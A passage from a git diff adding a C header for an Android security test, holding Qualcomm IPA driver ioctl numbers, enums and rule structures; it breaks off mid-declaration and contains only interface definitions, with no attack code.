new file mode 100644
index 0000000..889018d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35048450/local_poc.h
@@ -0,0 +1,1759 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+*/
+
+#ifndef _UAPI_MSM_IPA_H_
+#define _UAPI_MSM_IPA_H_
+
+#ifndef __KERNEL__
+#include <stdint.h>
+#include <stddef.h>
+#include <sys/stat.h>
+#endif
+#include <linux/ioctl.h>
+#include <linux/types.h>
+#include <linux/if_ether.h>
+
+/**
+ * unique magic number of the IPA device
+ */
+#define IPA_IOC_MAGIC 0xCF
+
+/**
+ * name of the default routing tables for v4 and v6
+ */
+#define IPA_DFLT_RT_TBL_NAME "ipa_dflt_rt"
+
+/**
+ * the commands supported by IPA driver
+ */
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+#define IPA_IOCTL_ADD_RT_RULE 2
+#define IPA_IOCTL_DEL_RT_RULE 3
+#define IPA_IOCTL_ADD_FLT_RULE 4
+#define IPA_IOCTL_DEL_FLT_RULE 5
+#define IPA_IOCTL_COMMIT_HDR 6
+#define IPA_IOCTL_RESET_HDR 7
+#define IPA_IOCTL_COMMIT_RT 8
+#define IPA_IOCTL_RESET_RT 9
+#define IPA_IOCTL_COMMIT_FLT 10
+#define IPA_IOCTL_RESET_FLT 11
+#define IPA_IOCTL_DUMP 12
+#define IPA_IOCTL_GET_RT_TBL 13
+#define IPA_IOCTL_PUT_RT_TBL 14
+#define IPA_IOCTL_COPY_HDR 15
+#define IPA_IOCTL_QUERY_INTF 16
+#define IPA_IOCTL_QUERY_INTF_TX_PROPS 17
+#define IPA_IOCTL_QUERY_INTF_RX_PROPS 18
+#define IPA_IOCTL_GET_HDR 19
+#define IPA_IOCTL_PUT_HDR 20
+#define IPA_IOCTL_SET_FLT 21
+#define IPA_IOCTL_ALLOC_NAT_MEM 22
+#define IPA_IOCTL_V4_INIT_NAT 23
+#define IPA_IOCTL_NAT_DMA 24
+#define IPA_IOCTL_V4_DEL_NAT 26
+#define IPA_IOCTL_PULL_MSG 27
+#define IPA_IOCTL_GET_NAT_OFFSET 28
+#define IPA_IOCTL_RM_ADD_DEPENDENCY 29
+#define IPA_IOCTL_RM_DEL_DEPENDENCY 30
+#define IPA_IOCTL_GENERATE_FLT_EQ 31
+#define IPA_IOCTL_QUERY_INTF_EXT_PROPS 32
+#define IPA_IOCTL_QUERY_EP_MAPPING 33
+#define IPA_IOCTL_QUERY_RT_TBL_INDEX 34
+#define IPA_IOCTL_WRITE_QMAPID 35
+#define IPA_IOCTL_MDFY_FLT_RULE 36
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD 37
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL 38
+#define IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED 39
+#define IPA_IOCTL_ADD_HDR_PROC_CTX 40
+#define IPA_IOCTL_DEL_HDR_PROC_CTX 41
+#define IPA_IOCTL_MDFY_RT_RULE 42
+#define IPA_IOCTL_ADD_RT_RULE_AFTER 43
+#define IPA_IOCTL_ADD_FLT_RULE_AFTER 44
+#define IPA_IOCTL_GET_HW_VERSION 45
+#define IPA_IOCTL_MAX 46
+
+/**
+ * max size of the header to be inserted
+ */
+#define IPA_HDR_MAX_SIZE 64
+
+/**
+ * max size of the name of the resource (routing table, header)
+ */
+#define IPA_RESOURCE_NAME_MAX 32
+
+/**
+ * max number of interface properties
+ */
+#define IPA_NUM_PROPS_MAX 35
+
+/**
+ * size of the mac address
+ */
+#define IPA_MAC_ADDR_SIZE 6
+
+/**
+ * max number of mbim streams
+ */
+#define IPA_MBIM_MAX_STREAM_NUM 8
+
+/**
+ * the attributes of the rule (routing or filtering)
+ */
+#define IPA_FLT_TOS (1ul << 0)
+#define IPA_FLT_PROTOCOL (1ul << 1)
+#define IPA_FLT_SRC_ADDR (1ul << 2)
+#define IPA_FLT_DST_ADDR (1ul << 3)
+#define IPA_FLT_SRC_PORT_RANGE (1ul << 4)
+#define IPA_FLT_DST_PORT_RANGE (1ul << 5)
+#define IPA_FLT_TYPE (1ul << 6)
+#define IPA_FLT_CODE (1ul << 7)
+#define IPA_FLT_SPI (1ul << 8)
+#define IPA_FLT_SRC_PORT (1ul << 9)
+#define IPA_FLT_DST_PORT (1ul << 10)
+#define IPA_FLT_TC (1ul << 11)
+#define IPA_FLT_FLOW_LABEL (1ul << 12)
+#define IPA_FLT_NEXT_HDR (1ul << 13)
+#define IPA_FLT_META_DATA (1ul << 14)
+#define IPA_FLT_FRAGMENT (1ul << 15)
+#define IPA_FLT_TOS_MASKED (1ul << 16)
+#define IPA_FLT_MAC_SRC_ADDR_ETHER_II (1ul << 17)
+#define IPA_FLT_MAC_DST_ADDR_ETHER_II (1ul << 18)
+#define IPA_FLT_MAC_SRC_ADDR_802_3 (1ul << 19)
+#define IPA_FLT_MAC_DST_ADDR_802_3 (1ul << 20)
+#define IPA_FLT_MAC_ETHER_TYPE (1ul << 21)
+
+/**
+ * enum ipa_client_type - names for the various IPA "clients"
+ * these are from the perspective of the clients, for e.g.
+ * HSIC1_PROD means HSIC client is the producer and IPA is the
+ * consumer
+ */
+enum ipa_client_type {
+ IPA_CLIENT_PROD,
+ IPA_CLIENT_HSIC1_PROD = IPA_CLIENT_PROD,
+ IPA_CLIENT_WLAN1_PROD,
+ IPA_CLIENT_HSIC2_PROD,
+ IPA_CLIENT_USB2_PROD,
+ IPA_CLIENT_HSIC3_PROD,
+ IPA_CLIENT_USB3_PROD,
+ IPA_CLIENT_HSIC4_PROD,
+ IPA_CLIENT_USB4_PROD,
+ IPA_CLIENT_HSIC5_PROD,
+ IPA_CLIENT_USB_PROD,
+ IPA_CLIENT_A5_WLAN_AMPDU_PROD,
+ IPA_CLIENT_A2_EMBEDDED_PROD,
+ IPA_CLIENT_A2_TETHERED_PROD,
+ IPA_CLIENT_APPS_LAN_WAN_PROD,
+ IPA_CLIENT_APPS_CMD_PROD,
+ IPA_CLIENT_ODU_PROD,
+ IPA_CLIENT_MHI_PROD,
+ IPA_CLIENT_Q6_LAN_PROD,
+ IPA_CLIENT_Q6_WAN_PROD,
+ IPA_CLIENT_Q6_CMD_PROD,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_PROD,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD,
+ IPA_CLIENT_Q6_DECOMP_PROD,
+ IPA_CLIENT_Q6_DECOMP2_PROD,
+ IPA_CLIENT_UC_USB_PROD,
+
+ /* Below PROD client type is only for test purpose */
+ IPA_CLIENT_TEST_PROD,
+ IPA_CLIENT_TEST1_PROD,
+ IPA_CLIENT_TEST2_PROD,
+ IPA_CLIENT_TEST3_PROD,
+ IPA_CLIENT_TEST4_PROD,
+
+ IPA_CLIENT_CONS,
+ IPA_CLIENT_HSIC1_CONS = IPA_CLIENT_CONS,
+ IPA_CLIENT_WLAN1_CONS,
+ IPA_CLIENT_HSIC2_CONS,
+ IPA_CLIENT_USB2_CONS,
+ IPA_CLIENT_WLAN2_CONS,
+ IPA_CLIENT_HSIC3_CONS,
+ IPA_CLIENT_USB3_CONS,
+ IPA_CLIENT_WLAN3_CONS,
+ IPA_CLIENT_HSIC4_CONS,
+ IPA_CLIENT_USB4_CONS,
+ IPA_CLIENT_WLAN4_CONS,
+ IPA_CLIENT_HSIC5_CONS,
+ IPA_CLIENT_USB_CONS,
+ IPA_CLIENT_USB_DPL_CONS,
+ IPA_CLIENT_A2_EMBEDDED_CONS,
+ IPA_CLIENT_A2_TETHERED_CONS,
+ IPA_CLIENT_A5_LAN_WAN_CONS,
+ IPA_CLIENT_APPS_LAN_CONS,
+ IPA_CLIENT_APPS_WAN_CONS,
+ IPA_CLIENT_ODU_EMB_CONS,
+ IPA_CLIENT_ODU_TETH_CONS,
+ IPA_CLIENT_MHI_CONS,
+ IPA_CLIENT_Q6_LAN_CONS,
+ IPA_CLIENT_Q6_WAN_CONS,
+ IPA_CLIENT_Q6_DUN_CONS,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_CONS,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS,
+ IPA_CLIENT_Q6_DECOMP_CONS,
+ IPA_CLIENT_Q6_DECOMP2_CONS,
+ IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS,
+ /* Below CONS client type is only for test purpose */
+ IPA_CLIENT_TEST_CONS,
+ IPA_CLIENT_TEST1_CONS,
+ IPA_CLIENT_TEST2_CONS,
+ IPA_CLIENT_TEST3_CONS,
+ IPA_CLIENT_TEST4_CONS,
+
+ IPA_CLIENT_MAX,
+};
+
+#define IPA_CLIENT_IS_APPS_CONS(client) \
+ ((client) == IPA_CLIENT_APPS_LAN_CONS || \
+ (client) == IPA_CLIENT_APPS_WAN_CONS)
+
+#define IPA_CLIENT_IS_USB_CONS(client) \
+ ((client) == IPA_CLIENT_USB_CONS || \
+ (client) == IPA_CLIENT_USB2_CONS || \
+ (client) == IPA_CLIENT_USB3_CONS || \
+ (client) == IPA_CLIENT_USB_DPL_CONS || \
+ (client) == IPA_CLIENT_USB4_CONS)
+
+#define IPA_CLIENT_IS_WLAN_CONS(client) \
+ ((client) == IPA_CLIENT_WLAN1_CONS || \
+ (client) == IPA_CLIENT_WLAN2_CONS || \
+ (client) == IPA_CLIENT_WLAN3_CONS || \
+ (client) == IPA_CLIENT_WLAN4_CONS)
+
+#define IPA_CLIENT_IS_ODU_CONS(client) \
+ ((client) == IPA_CLIENT_ODU_EMB_CONS || \
+ (client) == IPA_CLIENT_ODU_TETH_CONS)
+
+#define IPA_CLIENT_IS_Q6_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD)
+
+#define IPA_CLIENT_IS_Q6_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_CONS(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_CONS || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_PROD(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_PROD || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD)
+
+#define IPA_CLIENT_IS_MHI_CONS(client) \
+ ((client) == IPA_CLIENT_MHI_CONS)
+
+#define IPA_CLIENT_IS_MHI(client) \
+ ((client) == IPA_CLIENT_MHI_CONS || \
+ (client) == IPA_CLIENT_MHI_PROD)
+
+#define IPA_CLIENT_IS_TEST_PROD(client) \
+ ((client) == IPA_CLIENT_TEST_PROD || \
+ (client) == IPA_CLIENT_TEST1_PROD || \
+ (client) == IPA_CLIENT_TEST2_PROD || \
+ (client) == IPA_CLIENT_TEST3_PROD || \
+ (client) == IPA_CLIENT_TEST4_PROD)
+
+#define IPA_CLIENT_IS_TEST_CONS(client) \
+ ((client) == IPA_CLIENT_TEST_CONS || \
+ (client) == IPA_CLIENT_TEST1_CONS || \
+ (client) == IPA_CLIENT_TEST2_CONS || \
+ (client) == IPA_CLIENT_TEST3_CONS || \
+ (client) == IPA_CLIENT_TEST4_CONS)
+
+#define IPA_CLIENT_IS_TEST(client) \
+ (IPA_CLIENT_IS_TEST_PROD(client) || IPA_CLIENT_IS_TEST_CONS(client))
+
+/**
+ * enum ipa_ip_type - Address family: IPv4 or IPv6
+ */
+enum ipa_ip_type {
+ IPA_IP_v4,
+ IPA_IP_v6,
+ IPA_IP_MAX
+};
+
+/**
+ * enum ipa_rule_type - Type of routing or filtering rule
+ * Hashable: Rule will be located at the hashable tables
+ * Non_Hashable: Rule will be located at the non-hashable tables
+ */
+enum ipa_rule_type {
+ IPA_RULE_HASHABLE,
+ IPA_RULE_NON_HASHABLE,
+ IPA_RULE_TYPE_MAX
+};
+
+/**
+ * enum ipa_flt_action - action field of filtering rule
+ *
+ * Pass to routing: 5'd0
+ * Pass to source NAT: 5'd1
+ * Pass to destination NAT: 5'd2
+ * Pass to default output pipe (e.g., Apps or Modem): 5'd3
+ */
+enum ipa_flt_action {
+ IPA_PASS_TO_ROUTING,
+ IPA_PASS_TO_SRC_NAT,
+ IPA_PASS_TO_DST_NAT,
+ IPA_PASS_TO_EXCEPTION
+};
+
+/**
+ * enum ipa_wlan_event - Events for wlan client
+ *
+ * wlan client connect: New wlan client connected
+ * wlan client disconnect: wlan client disconnected
+ * wlan client power save: wlan client moved to power save
+ * wlan client normal: wlan client moved out of power save
+ * sw routing enable: ipa routing is disabled
+ * sw routing disable: ipa routing is enabled
+ * wlan ap connect: wlan AP(access point) is up
+ * wlan ap disconnect: wlan AP(access point) is down
+ * wlan sta connect: wlan STA(station) is up
+ * wlan sta disconnect: wlan STA(station) is down
+ * wlan client connect ex: new wlan client connected
+ * wlan scc switch: wlan interfaces in scc mode
+ * wlan mcc switch: wlan interfaces in mcc mode
+ * wlan wdi enable: wdi data path completed
+ * wlan wdi disable: wdi data path teardown
+ */
+enum ipa_wlan_event {
+ WLAN_CLIENT_CONNECT,
+ WLAN_CLIENT_DISCONNECT,
+ WLAN_CLIENT_POWER_SAVE_MODE,
+ WLAN_CLIENT_NORMAL_MODE,
+ SW_ROUTING_ENABLE,
+ SW_ROUTING_DISABLE,
+ WLAN_AP_CONNECT,
+ WLAN_AP_DISCONNECT,
+ WLAN_STA_CONNECT,
+ WLAN_STA_DISCONNECT,
+ WLAN_CLIENT_CONNECT_EX,
+ WLAN_SWITCH_TO_SCC,
+ WLAN_SWITCH_TO_MCC,
+ WLAN_WDI_ENABLE,
+ WLAN_WDI_DISABLE,
+ IPA_WLAN_EVENT_MAX
+};
+
+/**
+ * enum ipa_wan_event - Events for wan client
+ *
+ * wan default route add/del
+ * wan embms connect: New wan embms interface connected
+ */
+enum ipa_wan_event {
+ WAN_UPSTREAM_ROUTE_ADD = IPA_WLAN_EVENT_MAX,
+ WAN_UPSTREAM_ROUTE_DEL,
+ WAN_EMBMS_CONNECT,
+ WAN_XLAT_CONNECT,
+ IPA_WAN_EVENT_MAX
+};
+
+enum ipa_ecm_event {
+ ECM_CONNECT = IPA_WAN_EVENT_MAX,
+ ECM_DISCONNECT,
+ IPA_ECM_EVENT_MAX,
+};
+
+enum ipa_tethering_stats_event {
+ IPA_TETHERING_STATS_UPDATE_STATS = IPA_ECM_EVENT_MAX,
+ IPA_TETHERING_STATS_UPDATE_NETWORK_STATS,
+ IPA_TETHERING_STATS_EVENT_MAX,
+ IPA_EVENT_MAX_NUM = IPA_TETHERING_STATS_EVENT_MAX
+};
+
+#define IPA_EVENT_MAX ((int)IPA_EVENT_MAX_NUM)
+
+/**
+ * enum ipa_rm_resource_name - IPA RM clients identification names
+ *
+ * Add new mapping to ipa_rm_prod_index() / ipa_rm_cons_index()
+ * when adding new entry to this enum.
+ */
+enum ipa_rm_resource_name {
+ IPA_RM_RESOURCE_PROD = 0,
+ IPA_RM_RESOURCE_Q6_PROD = IPA_RM_RESOURCE_PROD,
+ IPA_RM_RESOURCE_USB_PROD,
+ IPA_RM_RESOURCE_USB_DPL_DUMMY_PROD,
+ IPA_RM_RESOURCE_HSIC_PROD,
+ IPA_RM_RESOURCE_STD_ECM_PROD,
+ IPA_RM_RESOURCE_RNDIS_PROD,
+ IPA_RM_RESOURCE_WWAN_0_PROD,
+ IPA_RM_RESOURCE_WLAN_PROD,
+ IPA_RM_RESOURCE_ODU_ADAPT_PROD,
+ IPA_RM_RESOURCE_MHI_PROD,
+ IPA_RM_RESOURCE_PROD_MAX,
+
+ IPA_RM_RESOURCE_Q6_CONS = IPA_RM_RESOURCE_PROD_MAX,
+ IPA_RM_RESOURCE_USB_CONS,
+ IPA_RM_RESOURCE_USB_DPL_CONS,
+ IPA_RM_RESOURCE_HSIC_CONS,
+ IPA_RM_RESOURCE_WLAN_CONS,
+ IPA_RM_RESOURCE_APPS_CONS,
+ IPA_RM_RESOURCE_ODU_ADAPT_CONS,
+ IPA_RM_RESOURCE_MHI_CONS,
+ IPA_RM_RESOURCE_MAX
+};
+
+/**
+ * enum ipa_hw_type - IPA hardware version type
+ * @IPA_HW_None: IPA hardware version not defined
+ * @IPA_HW_v1_0: IPA hardware version 1.0
+ * @IPA_HW_v1_1: IPA hardware version 1.1
+ * @IPA_HW_v2_0: IPA hardware version 2.0
+ * @IPA_HW_v2_1: IPA hardware version 2.1
+ * @IPA_HW_v2_5: IPA hardware version 2.5
+ * @IPA_HW_v2_6: IPA hardware version 2.6
+ * @IPA_HW_v2_6L: IPA hardware version 2.6L
+ * @IPA_HW_v3_0: IPA hardware version 3.0
+ */
+enum ipa_hw_type {
+ IPA_HW_None = 0,
+ IPA_HW_v1_0 = 1,
+ IPA_HW_v1_1 = 2,
+ IPA_HW_v2_0 = 3,
+ IPA_HW_v2_1 = 4,
+ IPA_HW_v2_5 = 5,
+ IPA_HW_v2_6 = IPA_HW_v2_5,
+ IPA_HW_v2_6L = 6,
+ IPA_HW_v3_0 = 10,
+ IPA_HW_v3_1 = 11,
+ IPA_HW_MAX
+};
+
+/**
+ * struct ipa_rule_attrib - attributes of a routing/filtering
+ * rule, all in LE
+ * @attrib_mask: what attributes are valid
+ * @src_port_lo: low port of src port range
+ * @src_port_hi: high port of src port range
+ * @dst_port_lo: low port of dst port range
+ * @dst_port_hi: high port of dst port range
+ * @type: ICMP/IGMP type
+ * @code: ICMP/IGMP code
+ * @spi: IPSec SPI
+ * @src_port: exact src port
+ * @dst_port: exact dst port
+ * @meta_data: meta-data val
+ * @meta_data_mask: meta-data mask
+ * @u.v4.tos: type of service
+ * @u.v4.protocol: protocol
+ * @u.v4.src_addr: src address value
+ * @u.v4.src_addr_mask: src address mask
+ * @u.v4.dst_addr: dst address value
+ * @u.v4.dst_addr_mask: dst address mask
+ * @u.v6.tc: traffic class
+ * @u.v6.flow_label: flow label
+ * @u.v6.next_hdr: next header
+ * @u.v6.src_addr: src address val
+ * @u.v6.src_addr_mask: src address mask
+ * @u.v6.dst_addr: dst address val
+ * @u.v6.dst_addr_mask: dst address mask
+ */
+struct ipa_rule_attrib {
+ uint32_t attrib_mask;
+ uint16_t src_port_lo;
+ uint16_t src_port_hi;
+ uint16_t dst_port_lo;
+ uint16_t dst_port_hi;
+ uint8_t type;
+ uint8_t code;
+ uint8_t tos_value;
+ uint8_t tos_mask;
+ uint32_t spi;
+ uint16_t src_port;
+ uint16_t dst_port;
+ uint32_t meta_data;
+ uint32_t meta_data_mask;
+ uint8_t src_mac_addr[ETH_ALEN];
+ uint8_t src_mac_addr_mask[ETH_ALEN];
+ uint8_t dst_mac_addr[ETH_ALEN];
+ uint8_t dst_mac_addr_mask[ETH_ALEN];
+ uint16_t ether_type;
+ union {
+ struct {
+ uint8_t tos;
+ uint8_t protocol;
+ uint32_t src_addr;
+ uint32_t src_addr_mask;
+ uint32_t dst_addr;
+ uint32_t dst_addr_mask;
+ } v4;
+ struct {
+ uint8_t tc;
+ uint32_t flow_label;
+ uint8_t next_hdr;
+ uint32_t src_addr[4];
+ uint32_t src_addr_mask[4];
+ uint32_t dst_addr[4];
+ uint32_t dst_addr_mask[4];
+ } v6;
+ } u;
+};
+
+/*! @brief The maximum number of Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of IHL offset Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of Mask Equal 128 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_128_EQNS 2
+
+/*! @brief The maximum number of IHL offset Range Check 16 Eqns */
+#define IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS 2
+
+/*! @brief Offset and 16 bit comparison equation */
+struct ipa_ipfltr_eq_16 {
+ int8_t offset;
+ uint16_t value;
+};
+
+/*! @brief Offset and 32 bit comparison equation */
+struct ipa_ipfltr_eq_32 {
+ int8_t offset;
+ uint32_t value;
+};
+
+/*! @brief Offset and 128 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_128 {
+ int8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+/*! @brief Offset and 32 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_32 {
+ int8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+/*! @brief Equation for identifying a range. Ranges are inclusive */
+struct ipa_ipfltr_range_eq_16 {
+ int8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+/*! @brief Rule equations which are set according to DS filter installation */
+struct ipa_ipfltri_rule_eq {
+ /*! 16-bit Bitmask to indicate how many eqs are valid in this rule */
+ uint16_t rule_eq_bitmap;
+ /*! Specifies if a type of service check rule is present */
+ uint8_t tos_eq_present;
+ /*! The value to check against the type of service (ipv4) field */
+ uint8_t tos_eq;
+ /*! Specifies if a protocol check rule is present */
+ uint8_t protocol_eq_present;
+ /*! The value to check against the protocol (ipv6) field */
+ uint8_t protocol_eq;
+ /*! The number of ip header length offset 16 bit range check
+ * rules in this rule */
+ uint8_t num_ihl_offset_range_16;
+ /*! An array of the registered ip header length offset 16 bit
+ * range check rules */
+ struct ipa_ipfltr_range_eq_16
+ ihl_offset_range_16[IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS];
+ /*! The number of mask equal 32 rules present in this rule */
+ uint8_t num_offset_meq_32;
+ /*! An array of all the possible mask equal 32 rules in this rule */
+ struct ipa_ipfltr_mask_eq_32
+ offset_meq_32[IPA_IPFLTR_NUM_MEQ_32_EQNS];
+ /*! Specifies if the traffic class rule is present in this rule */
+ uint8_t tc_eq_present;
+ /*! The value to check the traffic class (ipv4) field against */
+ uint8_t tc_eq;
+ /*! Specifies if the flow equals rule is present in this rule */
+ uint8_t fl_eq_present;
+ /*! The value to check the flow (ipv6) field against */
+ uint32_t fl_eq;
+ /*! The number of ip header length offset 16 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_16_present;
+ /*! The ip header length offset 16 bit equation */
+ struct ipa_ipfltr_eq_16 ihl_offset_eq_16;
+ /*! The number of ip header length offset 32 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_32_present;
+ /*! The ip header length offset 32 bit equation */
+ struct ipa_ipfltr_eq_32 ihl_offset_eq_32;
+ /*! The number of ip header length offset 32 bit mask equations in
+ * this rule */
+ uint8_t num_ihl_offset_meq_32;
+ /*! The ip header length offset 32 bit mask equation */
+ struct ipa_ipfltr_mask_eq_32
+ ihl_offset_meq_32[IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS];
+ /*! The number of ip header length offset 128 bit equations in this
+ * rule */
+ uint8_t num_offset_meq_128;
+ /*! The ip header length offset 128 bit equation */
+ struct ipa_ipfltr_mask_eq_128
+ offset_meq_128[IPA_IPFLTR_NUM_MEQ_128_EQNS];
+ /*! The metadata 32 bit masked comparison equation present or not */
+ /* Metadata based rules are added internally by IPA driver */
+ uint8_t metadata_meq32_present;
+ /*! The metadata 32 bit masked comparison equation */
+ struct ipa_ipfltr_mask_eq_32 metadata_meq32;
+ /*! Specifies if the Fragment equation is present in this rule */
+ uint8_t ipv4_frag_eq_present;
+};
+
+/**
+ * struct ipa_flt_rule - attributes of a filtering rule
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ * @to_uc: bool switch to pass packet to micro-controller
+ * @action: action field
+ * @rt_tbl_hdl: handle of table from "get"
+ * @attrib: attributes of the rule
+ * @eq_attrib: attributes of the rule in equation form (valid when
+ * eq_attrib_type is true)
+ * @rt_tbl_idx: index of RT table referred to by filter rule (valid when
+ * eq_attrib_type is true and non-exception action)
+ * @eq_attrib_type: true if equation level form used to specify attributes
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @rule_id: rule_id to be assigned to the filter rule. In case client specifies
+ * rule_id as 0 the driver will assign a new rule_id
+ */
+struct ipa_flt_rule {
+ uint8_t retain_hdr;
+ uint8_t to_uc;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_hdl;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ uint32_t rt_tbl_idx;
+ uint8_t eq_attrib_type;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint16_t rule_id;
+};
+
+/**
+ * enum ipa_hdr_l2_type - L2 header type
+ * IPA_HDR_L2_NONE: L2 header which isn't Ethernet II and isn't 802_3
+ * IPA_HDR_L2_ETHERNET_II: L2 header of type Ethernet II
+ * IPA_HDR_L2_802_3: L2 header of type 802_3
+ */
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+/**
+ * enum ipa_hdr_l2_type - Processing context type
+ * IPA_HDR_PROC_NONE: No processing context
+ * IPA_HDR_PROC_ETHII_TO_ETHII: Process Ethernet II to Ethernet II
+ * IPA_HDR_PROC_ETHII_TO_802_3: Process Ethernet II to 802_3
+ * IPA_HDR_PROC_802_3_TO_ETHII: Process 802_3 to Ethernet II
+ * IPA_HDR_PROC_802_3_TO_802_3: Process 802_3 to 802_3
+ */
+enum ipa_hdr_proc_type {
+ IPA_HDR_PROC_NONE,
+ IPA_HDR_PROC_ETHII_TO_ETHII,
+ IPA_HDR_PROC_ETHII_TO_802_3,
+ IPA_HDR_PROC_802_3_TO_ETHII,
+ IPA_HDR_PROC_802_3_TO_802_3,
+ IPA_HDR_PROC_MAX,
+};
+
+/**
+ * struct ipa_rt_rule - attributes of a routing rule
+ * @dst: dst "client"
+ * @hdr_hdl: handle to the dynamic header
+ it is not an index or an offset
+ * @hdr_proc_ctx_hdl: handle to header processing context. if it is provided
+ hdr_hdl shall be 0
+ * @attrib: attributes of the rule
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ */
+struct ipa_rt_rule {
+ enum ipa_client_type dst;
+ uint32_t hdr_hdl;
+ uint32_t hdr_proc_ctx_hdl;
+ struct ipa_rule_attrib attrib;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint8_t retain_hdr;
+};
+
+/**
+ * struct ipa_hdr_add - header descriptor includes in and out
+ * parameters
+ * @name: name of the header
+ * @hdr: actual header to be inserted
+ * @hdr_len: size of above header
+ * @type: l2 header type
+ * @is_partial: header not fully specified
+ * @hdr_hdl: out parameter, handle to header, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - header addition parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be written to IPA HW also?
+ * @num_hdrs: num of headers that follow
+ * @ipa_hdr_add hdr: all headers need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr {
